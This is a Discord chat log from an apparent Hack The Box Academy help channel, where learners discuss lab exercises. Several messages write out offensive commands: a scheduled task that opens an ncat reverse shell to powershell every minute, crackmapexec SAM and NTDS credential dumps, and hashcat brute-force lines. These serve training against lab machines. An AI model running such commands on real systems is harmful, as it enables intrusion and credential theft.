this should work no?

i dont use anything else than vim

because it doesn't

-vvv

-vvv

You don't need sudo

you were supposed to add that 😄

WHY DID THAT WORK

😭

Thanks man

omg

you won't get anywhere with such attitude

doesn't say that anywhere in the module

I'll try to find out why

What part made it work?

removing the sudo obviously

hello excuse me

i havent seen it for payment

paypal

in HTB academy

ask htb staff about that

@surreal rain

as far as i know there are (were?) some issues with payment processing recently but i don't know any of the details

anyway, if you're here for learning stuff, you can try some box 😄 i can offer myself to help for a bit

Oh lol I forgot to chmod ssh freaked out

guess they don't want me to lose my key

oh but it seems that I changed the permissions to low of an amount

that's why i told you to use -vvv

Don't be tagging the admins

Has anyone completely finished the Password Attacks module that could help with this? I have been stuck here for ages.

ok so

but really, work on your attitude. I'm trying to help you, i'm not trying to offend you or so. If you're just stupidly running random commands and pasting screenshots here to get help without really understanding whats happening or even trying to understand/research it on your own first, you're not getting pretty much anything from the academy.

I'm trying to learn it

it's just some of the errors are very confusing

that's my point - it's asking you for a password. SSH key is something totally different than a password

look for the answers yourself first, thats key

Alright

if you're expecting to get answers from somebody else, you won't really get anywhere in life at least from my experience. Ppl don't really hand out money for free in most cases

^
There wont always be someone to give you the answers and when push comes to shove, if you always relly on getting answers from other people youll get nowhere

if you'd run that without -vvv you should get a warning about incorrect perms on the key anyway, check the output of the command again

Don't give me hints lol, I'll try figuring it out myself

Command Injection Filter Evasion challenges fail to stay up when trying to spawn.

log out and login isn't working

with that module that Doxxel is on, a LOT of the info is in the module i'd suggest looking at your notes first for that

please guys

staff no respon , and i could chat to staff in bubble chat htb website i dont why

bruh just wait for a response from support

If you could chat to staff via the green bubble then you're all good.

been told a thousand times

as f0x said, wait. Asking here will not make your ticket be any quicker.

most companies be like "youll get a response in 2-3buisness days"

It's rather pointless asking here tbh if it is payment related

let me ask you guys , is there here using paypal or now for subscription?

in htb academy

If you see no option for paypal then there is no option for paypal.

What HTB provides is what is accepted

in my country there isnt credit card just debit

that suffer to subscription, is there any solution?

contact customer support (billing to be more specific)

email please

create a ticket and asking for billing support

where to do it?

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

hopefully there's more patience once they can access academy stuff; because hoo boy does the academy modules require some patience

i didnt get hackernoob role

how could i get it , becasue i could send screenshot proof here

@naive sky For any further questions or issues, please create a thread via #1024429874246590575. Lets have this channel on topic please.

i couldnt do

please i didnt get role

Verify your htb account in #bot-commands using ++verify

Is nosqli assessment 2 javascript injection?

idk have you tried JS injection?

has anybody done the proxy module on htb?

I'm at the proxying tools section but nothing seems to work like it should, has anyone encountered similare technical problems?

Can anyone point me in the right direction for the Attacking GitLab username question? The script on exploit-db didn't work for me so I wrote me own, it finds the usernames in the example so it works but what username list do I need to use? I tried all in the seclist usernames folder except the xato lists as the box timeout before it finishes the list.

Hello

I need help

http://dontasktoask.com/ && http://nohello.net/en

Hope my Q was ok?!

Your q was fine I was more responding to the person that just said "hello I need help" kinda vague

I haven't done the module you're on so can't help ya there

Pretty sure they work UK time, you messaged this at 4:30am.

Hi all, doing the AD module and trying to run Wireshark after xfreerdp-ing into the provided Linux box. WHen I run it without admin privileges, it, of course, does not work, but the application at least starts. When running with sudo, I get an error: "Main Warn could not connect to display :10.0". Seems like an issue with X... Could anyone help?

Which section?

Hey can someone tell me whats de neo4j default password in the pwnbox machine? I cant login with "neo4j:neo4j"

the neo4j on the pwnbox still have authentication issue so first if neo4j is already running stop it and run this after that you should be able to login

sudo sed 's/#dbms.security.auth_enabled=false/dbms.security.auth_enabled=false/g' /etc/neo4j/neo4j.conf > TEMP; sudo rm /etc/neo4j/neo4j.conf; sudo mv TEMP /etc/neo4j/neo4j.conf

which section?

i can't remember (i think it's because of some stupid character or something) but the script on exploit-db don't work use 49821.sh from searchsploit and for the username wordlist you just have to guess if you need a hint on that shoot me a dm or you can just use cat to output all username wordlist in seclist into a file a use that and it would be still fairly fast

The password for the neo4j service in the pwnbox is "htb"

oh wait so that's the issue??

yeah

xD

i was looking for the password

Got some help from @vital tree and now resolved.

nice

i was doing the same thing before and i swear i did see some staff agree this is an issue and even pin it some where

Its an issue bcs we dont know the password for the neo4j service. I asked the technical support for it

oh wait a sec so i think they fix the authentication issue thing

because before if you login with any cred neo4j will give you some auth error or some thing

Hi guys, could anyone please help me out?
Stuck at AD Enumeration & Attacks - Skills Assesment part I.
I need to get to MS01 machine, have got credentials for svc_sql which is (sql)admin on SQL01. The 2 ways they show in the course to pivot to SQL01 is not working for me.
Any advice anyone? Thanks

oh yep i just try they seem to have fixed it because the error is gone now

you can just ||rdp in|| 🤣

No way lol 😄

leaving because ping @tidal sonnet

Do I need to setup proxychains etc? Having a bit of trouble with this lab setup since can't reach certrain part of lab from kali, thinking port forwarding is kinda out of scope for this module

yep. i think i use autoroute on the web target machine

hey everyone, should I use the pws.list from Resources for the mssqlsvc password recovery ATTACKING COMMON SERVICES. The hash capture's impossible as IMPERSONATE is not authd with htbdbuser?? ! SOLVED through xp_dirtree hash steal 😐 am such a noob lolll

WINDOWS PRIVILEGE ESCALATION // Pillaging : is there something wrong with the SAM, SYSTEM, SECURITY files? i have tried using secretsdump.py on different machines and there is always a problem

Hello there I am currently doing Footprinting module with IPMI category, the question that I have to answer is

What is the account's cleartext password?

Now I got the hash and i am using the command

hashcat -m 7300 -O f0c30fba82140000603501e57454b97efe0520edb6529bf9d39cbf36a58500fc440912c3689ecf1ea123456789abcdefa123456789abcdef140561646d696e:8dc9a84533290d7d8e8d587953b6a9203e0b4b50 -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

but it says its around 1day to finish. While that might be the case sometimes, I feel that for the purpose of the lecture, i did something wrong 😛

Any help would be appreciated

@devout torrent what about using john

hint those file could be ||fake|| because htb is evil and hint check all ||backup||

I remember that section lol

Took me a good bit to figure that iut

oh wow that's evil yes. I also saw someone in a forum page mentionning they got the hash this way. Very confusing. Thank you for reorienting me

Hello, good day.

Please what's "RnD".
Saw it in the announcement.

Invest in RnD...

research and development

Ohhh okay

Thanks.
++

Why did the announcement get so many angry emoji's? It's good news no?

Hmm still stuck, port forwarding does not seem to work, feeling clueless now and throwing in the towell 😦

There are no writeups for the academy modules i assume?

Which module are you on?

12:33 posted and got answer, but still not working (couple comments above here in this chat)

I used pivoting heavily in those skills assesments

It makes the whole thing much much easier

For the bit you're up to you'll prolly wanna set up a socks proxy and then proxychains rdp

Tried through ssh but cannot reach kali ssh

Your kali machine can access 1 machine in the target network. You need to pivot through that machine

(Revisit your notes from the pivoting module. It'll be helpful I promise)

Allways having trouble with poart forwarding stuff tbh

I didn't do any port forwarding until the second skills assesment

I think I used chisel on the first one

Unless you have ssh access to the first machine. Then I would have used sshuttle

Thanks I will look into it now, hope it works 😄

Just remember that you can't send ICMP packets jver most pivots (so you can't confirm it works by trying to ping the other machines)

Hi, I have completed all modules in NETWORK ENUMERATION WITH NMAP except one where I can not find the solution for NETWORK ENUMERATION WITH NMAP-->Service Enumeration I'm quite sure that Nma & tcpdump is to use, but tcpdump does not show the flag

could someone hit me in the right direction please?

Initial enumeration

Hello! I need help with the FOOTPRINTING module, the section IMAP/POP3. I can't answer the first and the last question! please help 🙂

Have you run nmap <IP> -sC?

yes!

I ran nmap -sV -sC

read through the output carefully, that should give you no.1

sudo nmap -sC -sV -Pn -n --disable-arp-ping -p110,143,993,995 <IP>

ok

oooh men I tryied that but forgot the last 3 letters "ltd"

thanks I got the first one

That is a UK convention for company names "Limited" as in Limited Liability.

I also can't see the admin email address

anyone able to help with Attacking FTP of Attacking Common Services. Feel like this should be straightforward but am not getting anywhere with it. Have bruteforced with the usernames/wordlists with no results.

Have a read through the section again. Have you connected to the IMAP service? You want to read the email, and view it's associated data, to get the flag and the admin email

Hi all, doing the AD module (Initial Enumeration Section) and trying to run Wireshark after xfreerdp-ing into the provided Linux box. WHen I run it without admin privileges, it, of course, does not work, but the application at least starts. When running with sudo, I get an error: "Main Warn could not connect to display :10.0". Seems like an issue with X... Could anyone help?

Hello guys I have a bit struggle on Finding & Filtering Content (INTRODUCTION TO WINDOWS COMMAND LINE) So the 1st question and 3rd question I cannot get it (understand it) or just cannot type the correct answer....I am on it for the past 3 hours and looked everywhere for hints..... So 1st question is "

Hint: The 'Method' of which an object functions defines it.

and the 3rd one is:

Hint: We are looking recursively.

I just try all possible ways to find out I read everything few times again and again and still nothing came up 🤯
Also I checked the source code if I can get the answer but nothing 😄

Please give me some advice probably is super easy but cannot get it... Thanks

Try a different rdp program?

You can use tcpdump and output to a pcap file. Then tranfer that to your attack machine and analyze it with wireshrak

Tried both rdesktop and xfreerdp, with the same result.

Indeed, tcpdump and import to WS is a workaround, but still I'd like to know why WS doesn't run with sudo and how to resolve the underlying issue.

CHanging password for root and logging via remote desktop directly as root helped as well.

hi guys im a newbie and rn at the tier 1 "funnel" mission,there is goal with SSH forward remote tunneling and i got sum prblm...
i created 1234 port at the server under "christine" account then started listening it from my host and connected with psql database but terminal ignores all my type inputs for list dbs like \l with big yellow words END in the terminal...
anybody can u please help me with that

nahh im good idk why but my interaction input way with console a little bit different from tuts but i did it

Modul: Network Enumeration with Nmap
Section: Service Enumeration
I am trying to answer the question " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.". To find the flag I have tried to use tcpdump and nc. But I cannot capture any packets.
└──╼ [★]$ sudo tcpdump -i eth0 host 10.10.14.245 and 10.129.50.121 -v
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C
0 packets captured
3 packets received by filter
0 packets dropped by kernel

If nmap alone is the key then wich option do I need? -p- -sV ? but that does not show everything ... -sA did not help either

Use nmap

again, is anyone able to offer any tips for the Attacking Email Services. Brute forcing is painfully slow for me over the VPN and I haven't got any hits from the password list with the user I've found(and I'm using the full email address for this user in hydra - i.e. user@inlanefreight.htb)

just restarted the box and now it works.... great.

guys i have doubts in password attack module pass the ticket in linux will any one help me if yes then dm me i need a live help

i will share my screen

Hi all, I'm on the pen tester route and I'm doing the SMB shares but the information that is on the lesson page is not the same information I'm getting back even though I'm using the same command

Module: Password Attacks
Section:Credential Hunting in Linux
Guys, the objective isn't to look for credentials once you are in the host?
My dumb ass is here, brute-forcing this smb with a user cme found, but with no luck.
The HINT says ||there is user Kira with the password LoveYou1 for SSH||, but it does not work in reality. Nor any mutation of the suggested pwd. Do you have any leads i could start to go on?
Thank you!

@proper pagoda mutate that password

opt/vpnbash.sh: no such file
bash: /opt/vpnbash.sh: no such file when i run curl -s http://138.68.183.154:31036/ -X POST -d "/serial.php"

how do i fix this?

no it works check mutations again

Hi

allo

Im a guy that wants to learn how to hack, is this discord server to learn or for pros?

I am not sure, myself.

ok

just wanna know smt

to hack is it obligatory to use Kali Linux?

no

yes this is a discord for everyone

ok

kali linux is a collection of tools used by hackers.

but its preffered?

hey

the pwnbox on the site is parrotOS and not Kali Linux so you dong have to use it

You can use any OS.

if anybody is good with bash scripts, can you dm me?

I have windows

will that work?

even then, parrotOS is kinda eh

Yes, but install Linux on VM too.

and I would just use tiny linux with docker plus cloudflare-warp

but its a different operating system

linux

@flint depot tRUE

however. Under the hood, they are the same at the assembly level. They're just doing the same calculator arithmetic how they're designed and programmed to

and will my stuff get lost if i download linux?

from windows

no. it will if you install over the entire partition

coz thats how I know what will happen maybe im wrong

Should I just get a new pc and download linux there?

No, Install Linux on VM.

VM?

Whats that

or use WSL

or cygwin

ok

ill check them out

qemu is a good one if you're looking for thin-client plus kvm

Download VMWare Workstation or Virtual Box

I already have virutal box downloaded

dude, those are bloatly.....

use qemu or docker at that point.....

or mount a spreadsheet as a filesystem

but I already have virtual box

and it is already outdated....

oh

anyways thx for the help guys

use qemu if you need something that uses less disk space

ok

You're also welcome.

qemu

thxs

gtg now

This is getting off topic: #1024429874246590575 or #general is the better place for these convos; if you can't access them then you need to verify your HTB account in #bot-commands using the ++verify command

Hi team, I am stuck with this module - https://academy.hackthebox.com/module/77/section/726 - List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

I tried many different common passwords, even using a specific list of common used passwords for SMB, but still, no lucky. Any hints?

[★]$ smbclient -U bob \\10.129.42.254\users
Enter WORKGROUP\bob's password:
session setup failed: NT_STATUS_LOGON_FAILURE

for the attacking common services > FTP section. IS there a way to not make medusa so slow? Im getting one request in every 5 seconds and my password list has 14344391 entries.

Don't use Medusa 😅

I dont remember how I done that part but bob likes weak passwords

Yeah, i tried like 30 different passwords from most common password lists.. even specific lists for smb

Be a student lol

Hello, all. I may have found something that applies to most linux and linux like shells.

The ancat.github.io creator made a valuable point.

But, I am curious. If someone dependency injects over existing functions at runtime, how prone is everyone that has a ssh-server?

https://discord.com/channels/473760315293696010/1062240072092635206
https://ancat.github.io/python/2019/01/01/python-ptrace.html

seems like an interesting question but I dont see how its relevant for the modules channel. This isnt a general talk.

Fair. Does hack-the-box have said channel?

verify your account with #welcome to see the rest of the channels

i've been messing around with hydra now, and i keep getting [ERROR] all children were disabled due too many connection errors. EDIT i may have figured it out it was the -S flag.

thank you.

Hi everyone, happy new year! I’m just after some advice. I’ve been learning ethical hacking since October 2022, I’m comfortable with recon but I need to nail my exploiting. I can get so far in a box and get stuck… at this point in time do I then look at the walk through and rinse and repeat? What’s the best way of learning from your experiences on HTB?

Work on academy modules, practice on boxes, take good notes, set goals.

Okay, I’ll keep chipping away at it. I’ve taken many many many notes. I’ll go through the new multiverse and see if that helps

try to turn your notes of individual boxes into a general set of notes, like hacktricks. Develop a set of routines that you will do to enumerate the box and be familiar with what tools you will need depending on what you find.

Perfect, thank you!

im working on the windows command line module, the scheduled tasks section. I want to change the code to send a shell every minute
schtasks /create /sc MINUTE /mo 1 /tn "RevShell" /tr "C:\Users\htb-student\nc.exe 10.10.x.x 6969"
i have this code and its not working. The command will connect to the listener manually but not for the task. Anyone have any ideas?

hello

i need help. if you want help dm me please

when i try NOSQLi in the assessment 2 of NOSLi module, it does not receive a username, does it look like its sanitised?

Nobody knows what help you need, so nobody knows if they are able to help you.

Post your question here.

ok

i cant do google account. its says that this phone number used too many times.

sounds like a question for google

for the love of god this channel is for hackthebox academy modules

errm

Module: Active Directory Enumeration & Attacks

Section: AD Enumeration & Attacks - Skills Assessment Part II

Question: May I dm someone for a nudge for question “locate a configuration file containing an MSSQL connection string. What is the password for the user listed in the file?” to avoid spoilers?

Attempts: I’ve attempted to utilize smbclient and cme to recurse readable shares found with credentials on question 1&2 and 4&5 but can’t find/read the MSSQL connection string.

I am working on the DNS Footprinting Module (https://academy.hackthebox.com/module/112/section/1069) It seems like my target, not the pwnBox hangs after a while. I was wondering if you guys could go through the module to make sure it can be finished. It could also be that I am a noob.

so this seem to worked for me

schtasks /create /sc MINUTE /tn "sus" /tr "C:\Users\htb-student\ncat.exe 10.10.15.77 69 -e powershell"

the modifiers or /mt default is 1 so you don't need to put it in but the rest is looking right except you need the -e tag for a rev shell if you are using ncat

my note on that module is terrible but offshore been F ing me in my ass so i haven't got time to fix it yet but sure shoot me a dm also you don't need to put your question in that format

if you are working on the last question which needed brute force then if it is taking too long try a different wordlist also hint the you will need to brute force a ||subdomain||

Thank you! Will dm shortly

All are able to be completed (with the right word list)

In the portion where you're connecting locally are you putting your machine IP in? Or leaving it as the .x.x

he's ranked pro hacker 🤣

Listen

You could probably skiddie your way to pro

yep i'm definitely going to try that at least this year

dont bully light greenies in chat 😦

UNRELATED but can I send both yall a DM real quick?

me? sure

anyone else experiencing issues with the spawned hosts?
i refreshed 4 times already and none of them seem to answer.

yes i cant run assessment 1 in NOSQLi for 3 days

in NOSQLi, how can i break out of this sanitazion?

hey can I DM you one sec?

pls

sure

Depends on the type of system/attack expected, sometimes they can't be pinged

ping works, it's supposed to be a web challenge but no webserver seems to run

¯_(ツ)_/¯

talking to the support now

It also helps to know which module so we can check and see

Or hit you with that sticker ^

I'm a nab and the webserver is running on a non standard port and I just skimmed over that

time to sleep I guess

-.-

if you still need help feel free to shoot me a dm

omg thats awesome

can someone with a kali machine try to run pypykatz? I try it on my machine and keep getting module errors even though I checked if the module was installed

i hate pypykatz. Its missed things on more than one occasion for me. Id rather boot up a windows vm, transfer the files to there and use the actualy mimikatz

so since most of us spent here together quite some time and sometimes we really make stupid mistakes... and because this one has been the funniest one I have ever made wanted to share with you I spent like 20 mins trying to transfer a file using an ip with this format 10:10:15:170..... no more off topic from my side but really wanted to share this piece of art which I can't stop laughing at myself..... HAPPY LEARNING!

🙂

thx @vital adder !!!

🤣 i needed that laugh

good one right????!!!!

hahaahahaha

Hmm I don't see the problem, looks normal to me

you sure?

with :

in an ip?

😄

Yep normal to me lol

I can imagine someone creating a script to interpret ':' as '.' and basically swap them

True

Iirc there was a challenge box somewhere that removed spaces

Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key? struggeling abit with this question on javascript deobfuscation

which section are you on?

skillassesment

curl -s http:/SERVER_IP:PORT/ -X POST tried this command but it says command not found

so your should be on question 6? hint after decode the code try to make out a ||web directory|| and a request type after that just like the question said try to replicate it

almost right

whats wrong with the command?

hint it's missing something

aight thanks

ig i could also use burp suite

or go back to the Deobfuscation section and try the given site

Has any one seen the movie jolt

aight, thanks for the help 😄

There this awesome set up this chick has I wanna be that good

ill check it out tonight

So where do you go to know the method of getting into the file after nmap

And does anyone know what to do after nmap says that it has ignores ping

If your question is not related to a specific question of a section or module of HTB academy try doing modules and/or do research and you will find the answers you’re looking for

Thank you, i will try that when i get back on

😂 ya x.x was the rest of my ip

Yeah lol I figured, but some days you just have those moments you know

I need help with the Skills Assessment - Easy section of the Password Attacks module. I have tried everything to get a foothold, brute forcing ssh and ftp with the users I found using the userenum msfconsole. I tried mutated passwords lists, and I just cannot seem to get anyway into the host.

dm me

.

How about ya fuck off

https://tenor.com/view/boo-boo-this-man-gif-4868055

@vital adder its so odd
its there, hasnt run but is scheduled,

yayy I finally did it

looool

Are you laughing BC rm -rf?

btw part of the reason I asked so many questions on this is because the machine was broken

the boxes are rarely broken

^ usually it's the VPN connection that's broken first

Rather than the box

didn't need a vpn + the box was broken

I am able to add an Admin user with PrintNightmare. I ran CVE-2020-0668 with an admin user and I was able to get a shell with this user. I am still getting metepreter timeouts....

yo 🙂

so a command exec payload works fine? what kind of timeouts exactly - using session to the new user or while using the exploit?

@raven cairn

the added user was obviously meant to be admin so you'd root the box

one sec

two sec

three sec

off sec 😄

why wouldn't you just login?

just smb cmd exec, winrm or so

Is there an SU equivalent in windows?

i'm not sure how much familiar with these tools are you

yeah, runas

you can do runas /user:someone cmd.exe or so

I'm familiar with a lot of the CPTS material (I am 90% done) but my windows skills aren't good tbh

no clue what CPTS is 😄

It's the pentesting cert for Hackthebox

oh ok, my point was if you have local admin, you can most likely run commands over smb, winrm, rdp or so

and pwn the box that way as runas can be problematic at times

so it's probably better to try something else first and keep the runas kind of like the last resort thing

sooo? 😄

👀

😆

AAAAAAAAAAA

BBB?

So if i understand correctly, I am supposed to run rdp with the hacker user I created?????

Like I'm lost

My brain no work

smb/winrm/rdp

most likely something like crackmapexec -u user -p password --sam 1.2.3.4 should be fine to pwn the server

if that's dc then something like crackmapexec -u user -p password --ntds --drsuapi 1.2.3.4 or so

psexec wmiexec smbexec

the list goes on lol

@high sentinel got it. Thank you very much

holy shit i am stupid 🤣

I am not good with instructions haha

Much much easier than I thought

literally just needed to rdp as local admin🤦‍♀️

mmmmmmmmmmmmmmmmm,

klo

Mood

No one is more stupid than me. 🙂 Much love bro

hello where is the newbie chatbox?

Hi there, there's a #general chat and much more if you verify

it's in #welcome

Hey, asking here since this one is really active compared to others, but does anyone here know how to fix hashcat issues? I've manually reinstalled it according to their guide and its still giving me the shared.cl error

ask in a more accurate channel, this one is for module discussion. Activity levels are irrelevant, post in the correct spaces.

Gotcha, which channel would be best for that question?

not really a tech support server so not sure. Can ask in general but good luck getting an answer. Could try positing in community help too

I did ask in starting point, because its from that lab area, but nobody there knew how to fix it

sometimes it be like that

it do be like that ¯_(ツ)_/¯

Can anyone help me with SQLMap Skills assessment? I found the attack vector but I'm struggling to move forward

Any hints on the second question of https://academy.hackthebox.com/module/77/section/844 ?

Linux priv escalation - "Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'."

I got from user1 to user2, but I'm stuck on what to do to get root access

What have you tried

chmod bin/bash, and /root/

operation not permitted

I can see the /root directory permissions is root/user2

The second one is for user2 group, right?

Tried find /root -writable 2>/dev/null to see if there's something writable within the folder, nothing

Need to go over some more of the initial basics. review the appropriate section from the module again.

Check the root directory. The module talks about what specifically you can look for

theres a couple of "goto checks" that you havnt done.

^

But as you stated you can see the root dir

Yeap, and the flag, I just don't have permissions to read it and I don't know what to do to escalate from user2 to root

What else can you see

/root directory has group permissions set to user2. This means that any user that is a member of the user2 group can read and execute files within the /root directory, but cannot write to or modify the files in that directory.

Yes

I thought I could be able to see the content of the files, but not modify or delete them

Yes you can see

But flag.txt is root root

The module talks about how to look for things

And what thing you might be interested in

i'm in the middle of doing some stuff right now but sure shoot me a dm if you still need help

Hi all

may anybody please assist me imap command which is in footprinting module. in imap/pop3 section.. i stuck in ladt two questions.

even i know where to find the last question but the commands shows error of syntax errors on fetch or examine command. Please help me.
Thanks

give this a try #modules message

SSH keys?

Bingo

certainly something worth checking

Copied the priv key, created a id_rsa file on my own machine and used it to connect to SSH
root@gettingstartedprivesc-691403-59df5b9657-28z4k:~# whoami
root
🙂

tks

<3 happy hacking

Thanks for sharing the link @vital adder .but thats the problem those commands are not working. i dont understand why. i put the same commands but it shows syntax errors.

@ivory hollow I'm trying to guess where you might be (in the IMAP thing). Make sure to include 1<space> before each command. The character "one"

^

The 1<space> is to IMAP as the semicolon ; is to sql

like i use select DEV.DEPARTMENT.INT

as this command.

||1 SELECT "DEV.DEPARTEMENT.INT"||

but further i use fetch DEV.DEPARTMENT.INT.

then it shows error

okay

let me check my notes real quick

i try

this was not working when using 1 in front of select. it shows command not found.

There has to be quotes around it

i dm you @raw elbow

Iirc IMAP is case sensitive, no?

I know POP3 isn't

I believe so

hmmm just tried and both fetch and FETCH seem to work

yeah it's not case sensitive (IMAPS).

ah, right. ok. I understand the question now. but, dev.department.int doesnt exist, where DEV.DEPARTMENT.INT does.

ahhhh

makes sense, the values are case-sensitive but the commands aren't

yeah you're right.

**Module: **Password Attacks
**Section: **Password Mutations
**Issue Summary: **My generated wordlist for brute forcing SSH is 187k+ lines and is taking too long to process.
Attempted Solutions: cut the first 17k lines of the mut_password.list as suggested in previous discord threads.

Any suggestions to reduce the volume of passwords to use in the SSH brute force would be greatly appreciated.

Try bruting other services first

Ssh is a last ditch effort to brute

has anybody ever had this issue when using hashcat? "Host memory required for this attack: 0 MB"

no but adding the -O flag fixes most hashcat errors

still didn't work 😦

Can you show a screenshot of the error message?

9aa2a870d0001ea6569ec7ab579bd409

can you try and crack this using rockyou.txt

its a md5 hash

Youre positive its md5?

hashcat doesn't show any errors, it just says it exhausted

yeah i made the hash

to test if it would work

If hashcat says exhausted then the password isnt in rockyou.txt

it is tho :/

i took the password "iloveyou"

and hashed it

iloveyou is the first word in the list

maybe im losing it

and doing something terribly wrong lmao

im 99% sure you didnt hash it properly

perhaps not 😦

f25a2fc72690b780b2a14e140ef6a9e0 This is the md5 hash for iloveyou

check dms please

Anyone have a nudge for the last question Footprinting - mySQL ? I have found the email for the customer in the question but im getting an error. I'm showing all of the customers with their information in front of me, so I'm kind of confuesd.

DM me what you got, I just revisited that section or a screenshot of what you're meaning

Finally finished CPTS AND CBBH Path, time to prepare for the exam!!!

Resolved, pesky space elves

blarrrrg

Im about to get off for the night. but i'm stuck on attacking common services easy lab.

I found creds... I found the two files that gave me a clue where to go next and I'm pretty sure i know the payload to send. I'm just having a hard time coming to this conlusion. Would someone with good notes DM me? I could use some help explaining this.

I'm also stuck on this. I use the keys daily, but the module won't accept my input 😦

If anyone is available to chat about the "Using CrackMapExec" Skills Assessment I'd appreciate it.

To anyone who's taken the cpts exam, do you recommend taking some time to study and practice on active/retired machines after finishing all of the modules? My plan is to just take the exam asap while the material is still fresh in my mind

is the reason a macOS fundamentals section was added because its being planned to add more stuff related to hacking macOS?

I just wanted to ask

lol

that could be an entire learning path

or am I just not getting it?

I was gonna try to do everything in general but that seems a little like "ok why would I do that?" but I'm torn between that and just finishing InfoSec fundamentals and getting into job-role paths

thus far my goals has mainly been to complete both job-role paths by the end of this year (I started with InfoSec fundamentals this past Fall late in semester)

@quasi wave i was in depression i was unable to get a flag from 2 days i was trying to post my problem you are spamming here

and Making fun of My Name

sorry I didn't mean to diss

I meant it in jest

bro i was kidding

oh

damn I believed you

😆

ok lol

no I am literally doing the InfoSec fundamentals module

I'm more than 60% of way through

63% approximately

so ya

Is there a proper way to use htb in school

Wifi keeps kicking me off itself

sigh

School wifi

I cant

@dawn wing @cunning drum Please keep this channel on topic

Okay

@novel matrix sorry

Is it actually possible to do the footprint easy lab without reading the hint

I'm having no luck brute-forcing SMB in the Attacking Common Services module, using both the provided and discovered password lists. Has anyone finished that section that could provide some insight?

HTB Academy -> Module: File Inclusion -> section : Php filter

I tried by Source Code Disclosure (convert-base64) , curl , nothing happen any guidance

If i wanna learn hacking apps which which should i go for

Like which module

idk, how bout following basic toolset path on HTB Academy

Also im stuck on active subdomain enumeration section from information gathering - web edition module can someone help xD

What question

Gotta be specific!

For apps for hacking
Or Hacking apps

Hacking apps*

erm

yes, the second one about " Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer."

goody gosh

Send me a PM with a screenshot

Is tht the module name

lmaolmao nooo

That stuff would be probably

More high level

Ohhk

Start with the basic stuff

Uhh

Networking Fundamentals

hola ?

In section nmap "module/19/section/103" there is a question asking for a flag by checking on services, i got the flag but it says wrong answer? any fixes or get arounds ? Service enumeration section

Did you accidentally copy extra whitespace?

nope

cheked twice

and thrice

Did you figure it out? Feel free to DM me, if you want me to verify that you have the right one.

No. Please read the rules

Hello, I'm having trouble with this question from the INFORMATION GATHERING - WEB EDITION:

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer

nslook commands seem to not be able to reach the domain

Maybe try respawning the target. Are you using VPN to connect to the HTB server?

I'm using the pwnboxes from the platform

i was stuck at password atacks Protected Files

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

i was trying to brute ftp and ssh am i doing correct

@past tundra The https://hackertarget.com/zone-transfer doesn't seem to be able to reach the domain either.

pm with screenshot please

OKEY, AT IT

@vital adder would you mind if I do ypu?

sure

The footprint lab boxes are a beast to do ❤️

Hello , I’d like to know how I can change the email address of my current account because of I want to put my student one instead of my personal address

hey, I read in the practice section of cpts that at the end of each module, there will be number of suggested retired machines, I tried to find them but I could not, can anyone help?

I'm trying to post something here but the bot keeps deleting it

can someone teach me mobile hacking

is there a wget command for windows cmd line or can i only use PS for downloads

is anyone having trouble spawning module targets?

I am doing Skill Assessment 1 of Windows Privilege Escalation. I have to find: confidential.txt I have tried with tools to find this file, also with ||findstr /spin "confidential.txt"|| but I am not able to locate this file, can someone provide me a nudge?

Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number). struggeling alot with this one @agile spire @solid python sorry for tagging, but need expert help

Yea, I'm having issues. I see someone else has mentioned it in #cpts

In the Attacking Passwords - Pash the Hash module, why would logins for other computers be stored in the memory of the MS01 computer?

I think I have misunderstood something somewhere.

I've found the hashes with mimikatz, I just don't understand why they'd be there.

You should Learn About Active Directory

Google it tbh

I found it in Google in like a few seconds

Hey ,iwant to ask something,if I don't go to college majoring in cyber security, can I work as a cyber security?

Yeah

If you have the right certifications

College degree just means you made a time committed effort to learn

Ahhh, sowhat certificate must be prepared if i want to become a redteam(pentenster)?I see a lot on YouTube and it confuses me😭😭😭

A certification is a document given by a registered company that is proof that you have the knowledge of a subject.

I.E. CompTIA A+, Network+, Security+... Or OSCP, or the htb CPTS

And a lot of times a certification can substitute as work experience

Ah,감사합니다(thank you)🤣😭 @fathom pendant

This channel is for asking questions regarding modules found on http://academy.hackthebox.com and to get your name colored you need to verify in #bot-commands and you will see more channels

They aren't logings for a other computer. They're user logins. Those users happen to have logged in to MS01. Once you grab their creds you can use them to log in to any other machine on the domain the said user can log in to

Okay, so that makes sense. But in the MimiKatz output, what is the meaning of Logon Server:

Authentication Id : 0 ; 445139 (00000000:0006cad3) Session : Service from 0 User Name : julio Domain : INLANEFREIGHT Logon Server : DC01 Logon Time : 1/12/2023 8:18:32 AM SID : S-1-5-21-3325992272-2815718403-617452758-1106

Thank you

In an AD domain, logins aren't validated by the computer. They're validated by the domain controller

In large domains there can be more than one DC, so the DC that validated the login is stored as well

Oh yeah!

got it. thank you so much

Np

Hello, good day.

I was wondering, there's the CPTS and CBBH paths with modules (I haven't gone through either of them Indepth),

1, Why exactly would I choose CBBH over CPTS, I'm seriously curious, are the modules similar in both paths or there's more that makes one a CBBH and more that makes one a CPTS, also,

2, Since CPTS can engage in CBBH activities and vice versa, what's the diamond in the dirt?

I'd like to know so I can choose perfectly based on my goals and personality.

I understand that a bounty hunter's main goal is to find bugs and squash them but a pentester doesn't actually set out to look for them or am I not getting the concept properly?

I'll like some enlightenment, thank you.

Bug bounty hunter is all about service application exploiting, penetration tester is about taking the exploits and gaining access deeper into the system

Which is why there's overlap

Kinda hard not to dip into bug bounties when doing penetration testing

Bug bounty is fundamentally different than pentesting in the fact that you'll be looking very very deeply into webapps mostly. Yes there is some overlap but the two roles are completely different. Pentesting aims to fully compromise a network where bug bounty aims to compromise an application

^

Thanks @fathom pendant and @graceful rampart .

I just worked this out today after being around for 11 months! 🥺

